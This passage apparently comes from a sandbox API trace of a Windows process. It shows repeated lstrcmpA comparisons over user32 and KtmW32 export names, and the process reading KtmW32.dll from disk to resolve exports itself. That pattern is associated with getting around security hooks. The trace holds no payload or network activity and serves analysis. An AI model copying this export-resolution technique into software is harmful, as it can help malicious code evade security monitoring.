(lpString1="AppendMenuA", lpString2="AddClipboardFormatListener") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRect") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AdjustWindowRectEx") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AlignRects") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowForegroundActivation") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AllowSetForegroundWindow") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AnimateWindow") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AnyPopup") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuA", lpString2="AppendMenuA") returned 0 [0129.858] lstrcmpA (lpString1="AppendMenuW", lpString2="ActivateKeyboardLayout") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuW", lpString2="AddClipboardFormatListener") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRect") returned 1 [0129.858] lstrcmpA (lpString1="AppendMenuW", lpString2="AdjustWindowRectEx") returned 1 [0129.859] lstrcmpA (lpString1="AppendMenuW", lpString2="AlignRects") returned 1 [0129.859] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowForegroundActivation") returned 1 [0129.859] lstrcmpA (lpString1="AppendMenuW", lpString2="AllowSetForegroundWindow") returned 1 [0129.859] lstrcmpA (lpString1="AppendMenuW", lpString2="AnimateWindow") returned 1 [0129.859] lstrcmpA (lpString1="AppendMenuW", lpString2="AnyPopup") returned 1 [0129.859] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuA") returned 1 [0129.859] lstrcmpA (lpString1="AppendMenuW", lpString2="AppendMenuW") returned 0 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ActivateKeyboardLayout") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AddClipboardFormatListener") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRect") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AdjustWindowRectEx") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AlignRects") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowForegroundActivation") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AllowSetForegroundWindow") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnimateWindow") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AnyPopup") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuA") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="AppendMenuW") returned 1 [0129.859] lstrcmpA (lpString1="ArrangeIconicWindows", lpString2="ArrangeIconicWindows") returned 0 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="ActivateKeyboardLayout") returned 1 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="AddClipboardFormatListener") returned 1 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRect") returned 1 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="AdjustWindowRectEx") returned 1 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="AlignRects") returned 1 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowForegroundActivation") returned 1 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="AllowSetForegroundWindow") returned 1 [0129.859] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnimateWindow") returned 1 [0129.860] lstrcmpA (lpString1="AttachThreadInput", lpString2="AnyPopup") returned 1 [0129.860] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuA") returned 1 [0129.860] lstrcmpA (lpString1="AttachThreadInput", lpString2="AppendMenuW") returned 1 [0129.860] lstrcmpA (lpString1="AttachThreadInput", lpString2="ArrangeIconicWindows") returned 1 [0129.860] lstrcmpA (lpString1="AttachThreadInput", lpString2="AttachThreadInput") returned 0 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ActivateKeyboardLayout") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AddClipboardFormatListener") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRect") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AdjustWindowRectEx") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AlignRects") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowForegroundActivation") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AllowSetForegroundWindow") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnimateWindow") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AnyPopup") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuA") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AppendMenuW") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="ArrangeIconicWindows") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="AttachThreadInput") returned 1 [0129.860] lstrcmpA (lpString1="BeginDeferWindowPos", lpString2="BeginDeferWindowPos") returned 0 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="ActivateKeyboardLayout") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AddClipboardFormatListener") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRect") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AdjustWindowRectEx") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AlignRects") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AllowForegroundActivation") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AllowSetForegroundWindow") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AnimateWindow") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AnyPopup") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuA") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AppendMenuW") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="ArrangeIconicWindows") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="AttachThreadInput") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="BeginDeferWindowPos") returned 1 [0129.861] lstrcmpA (lpString1="BeginPaint", lpString2="BeginPaint") returned 0 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="ActivateKeyboardLayout") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AddClipboardFormatListener") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRect") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AdjustWindowRectEx") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AlignRects") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AllowForegroundActivation") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AllowSetForegroundWindow") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AnimateWindow") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AnyPopup") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuA") returned 1 [0129.861] lstrcmpA (lpString1="BlockInput", lpString2="AppendMenuW") returned 1 [0129.862] lstrcmpA (lpString1="BlockInput", lpString2="ArrangeIconicWindows") returned 1 [0129.862] lstrcmpA (lpString1="BlockInput", lpString2="AttachThreadInput") returned 1 [0129.862] lstrcmpA (lpString1="BlockInput", lpString2="BeginDeferWindowPos") returned 1 [0129.862] lstrcmpA (lpString1="BlockInput", lpString2="BeginPaint") returned 1 [0129.862] lstrcmpA (lpString1="BlockInput", lpString2="BlockInput") returned 0 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="ActivateKeyboardLayout") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AddClipboardFormatListener") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRect") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AdjustWindowRectEx") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AlignRects") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowForegroundActivation") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AllowSetForegroundWindow") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnimateWindow") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AnyPopup") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuA") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AppendMenuW") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="ArrangeIconicWindows") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="AttachThreadInput") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginDeferWindowPos") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="BeginPaint") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="BlockInput") returned 1 [0129.862] lstrcmpA (lpString1="BringWindowToTop", lpString2="BringWindowToTop") returned 0 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ActivateKeyboardLayout") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AddClipboardFormatListener") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRect") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AdjustWindowRectEx") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AlignRects") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowForegroundActivation") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AllowSetForegroundWindow") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnimateWindow") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AnyPopup") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuA") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AppendMenuW") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="ArrangeIconicWindows") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="AttachThreadInput") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginDeferWindowPos") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BeginPaint") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BlockInput") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BringWindowToTop") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessage", lpString2="BroadcastSystemMessage") returned 0 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ActivateKeyboardLayout") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AddClipboardFormatListener") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRect") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AdjustWindowRectEx") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AlignRects") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowForegroundActivation") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AllowSetForegroundWindow") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnimateWindow") returned 1 [0129.863] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AnyPopup") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuA") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AppendMenuW") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="ArrangeIconicWindows") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="AttachThreadInput") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginDeferWindowPos") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BeginPaint") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BlockInput") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BringWindowToTop") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessage") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageA", lpString2="BroadcastSystemMessageA") returned 0 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ActivateKeyboardLayout") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AddClipboardFormatListener") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRect") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AdjustWindowRectEx") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AlignRects") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowForegroundActivation") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AllowSetForegroundWindow") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnimateWindow") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AnyPopup") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuA") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AppendMenuW") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="ArrangeIconicWindows") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="AttachThreadInput") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginDeferWindowPos") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BeginPaint") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BlockInput") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BringWindowToTop") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessage") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageA") returned 1 [0129.864] lstrcmpA (lpString1="BroadcastSystemMessageExA", lpString2="BroadcastSystemMessageExA") returned 0 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ActivateKeyboardLayout") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AddClipboardFormatListener") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRect") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AdjustWindowRectEx") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AlignRects") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowForegroundActivation") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AllowSetForegroundWindow") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnimateWindow") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AnyPopup") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuA") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AppendMenuW") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="ArrangeIconicWindows") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="AttachThreadInput") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginDeferWindowPos") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BeginPaint") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BlockInput") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BringWindowToTop") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessage") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageA") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExA") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageExW", lpString2="BroadcastSystemMessageExW") returned 0 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ActivateKeyboardLayout") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AddClipboardFormatListener") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRect") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AdjustWindowRectEx") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AlignRects") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowForegroundActivation") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AllowSetForegroundWindow") returned 1 [0129.865] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnimateWindow") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AnyPopup") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuA") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AppendMenuW") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="ArrangeIconicWindows") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="AttachThreadInput") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginDeferWindowPos") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BeginPaint") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BlockInput") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BringWindowToTop") returned 1 [0129.866] lstrcmpA (lpString1="BroadcastSystemMessageW", lpString2="BroadcastSystemMessage") returned 1 [0130.699] GetProcessHeap () returned 0x590000 [0130.699] HeapFree (in: hHeap=0x590000, dwFlags=0x0, lpMem=0x40c7040 | out: hHeap=0x590000) returned 1 [0130.707] GetProcessHeap () returned 0x590000 [0130.707] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x10) returned 0x5a90e0 [0130.708] LoadLibraryA (lpLibFileName="KtmW32.dll") returned 0x7ffc4bf10000 [0130.714] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetModuleFileNameA") returned 0x7ffc5ecf6e30 [0130.714] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CreateFileA") returned 0x7ffc5ecfd8a0 [0130.714] GetModuleFileNameA (in: hModule=0x7ffc4bf10000, lpFilename=0x14f5d0, nSize=0x104 | out: lpFilename="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")) returned 0x1e [0130.714] CreateFileA (lpFileName="C:\\Windows\\SYSTEM32\\KtmW32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x17c [0130.714] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="GetFileSizeEx") returned 0x7ffc5ecfdaa0 [0130.714] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="CloseHandle") returned 0x7ffc5ecfd650 [0130.714] GetFileSizeEx (in: hFile=0x17c, lpFileSize=0x14f5b0 | out: lpFileSize=0x14f5b0*=24064) returned 1 [0130.714] GetProcessHeap () returned 0x590000 [0130.715] RtlAllocateHeap (HeapHandle=0x590000, Flags=0x0, Size=0x5e00) returned 0x2d05030 [0130.715] GetProcAddress (hModule=0x7ffc5ecd0000, lpProcName="ReadFile") returned 0x7ffc5ecfdbd0 [0130.715] ReadFile (in: hFile=0x17c, lpBuffer=0x2d05030, nNumberOfBytesToRead=0x5e00, lpNumberOfBytesRead=0x14f5a4, lpOverlapped=0x0 | out: lpBuffer=0x2d05030*, lpNumberOfBytesRead=0x14f5a4*=0x5e00, lpOverlapped=0x0) returned 1 [0130.716] CloseHandle (hObject=0x17c) returned 1 [0130.716] lstrcmpA (lpString1="CommitComplete", lpString2="CommitComplete") returned 0 [0130.716] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitComplete") returned 1 [0130.716] lstrcmpA (lpString1="CommitEnlistment", lpString2="CommitEnlistment") returned 0 [0130.716] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitComplete") returned 1 [0130.716] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitEnlistment") returned 1 [0130.717] lstrcmpA (lpString1="CommitTransaction", lpString2="CommitTransaction") returned 0 [0130.717] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitComplete") returned 1 [0130.717] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitEnlistment") returned 1 [0130.717] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransaction") returned 1 [0130.717] lstrcmpA (lpString1="CommitTransactionAsync", lpString2="CommitTransactionAsync") returned 0 [0130.717] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitComplete") returned 1 [0130.717] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitEnlistment") returned 1 [0130.717] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransaction") returned 1 [0130.717] lstrcmpA (lpString1="CreateEnlistment", lpString2="CommitTransactionAsync") returned 1 [0130.717] lstrcmpA (lpString1="CreateEnlistment", lpString2="CreateEnlistment") returned 0 [0130.717] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitComplete") returned 1 [0130.717] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitEnlistment") returned 1 [0130.717] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransaction") returned 1 [0130.717] lstrcmpA (lpString1="CreateResourceManager", lpString2="CommitTransactionAsync") returned 1 [0130.717] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateEnlistment") returned 1 [0130.717] lstrcmpA (lpString1="CreateResourceManager", lpString2="CreateResourceManager") returned 0 [0130.717] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitComplete") returned 1 [0130.717] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitEnlistment") returned 1 [0130.717] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransaction") returned 1 [0130.717] lstrcmpA (lpString1="CreateTransaction", lpString2="CommitTransactionAsync") returned 1 [0130.717] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateEnlistment") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateResourceManager") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransaction", lpString2="CreateTransaction") returned 0 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitComplete") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitEnlistment") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransaction") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateEnlistment") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateResourceManager") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransaction") returned 1 [0130.718] lstrcmpA (lpString1="CreateTransactionManager", lpString2="CreateTransactionManager") returned 0 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitComplete") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitEnlistment") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransaction") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CommitTransactionAsync") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateEnlistment") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateResourceManager") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransaction") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="CreateTransactionManager") returned 1 [0130.718] lstrcmpA (lpString1="GetCurrentClockTransactionManager", lpString2="GetCurrentClockTransactionManager") returned 0 [0130.718] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitComplete") returned 1 [0130.718] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitEnlistment") returned 1 [0130.718] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransaction") returned 1 [0130.718] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CommitTransactionAsync") returned 1 [0130.718] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateEnlistment") returned 1 [0130.718] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateResourceManager") returned 1 [0130.719] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransaction") returned 1 [0130.719] lstrcmpA (lpString1="GetEnlistmentId", lpString2="CreateTransactionManager") returned 1 [0130.719] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetCurrentClockTransactionManager") returned 1 [0130.719] lstrcmpA (lpString1="GetEnlistmentId", lpString2="GetEnlistmentId") returned 0 [0130.719] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitComplete") returned 1 [0130.720] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitEnlistment") returned 1 [0130.720] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransaction") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CommitTransactionAsync") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateEnlistment") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateResourceManager") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransaction") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="CreateTransactionManager") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetCurrentClockTransactionManager") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentId") returned 1 [0130.721] lstrcmpA (lpString1="GetEnlistmentRecoveryInformation", lpString2="GetEnlistmentRecoveryInformation") returned 0 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitComplete") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitEnlistment") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransaction") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CommitTransactionAsync") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateEnlistment") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateResourceManager") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransaction") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="CreateTransactionManager") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", lpString2="GetCurrentClockTransactionManager") returned 1 [0130.721] lstrcmpA (lpString1="GetNotificationResourceManager", 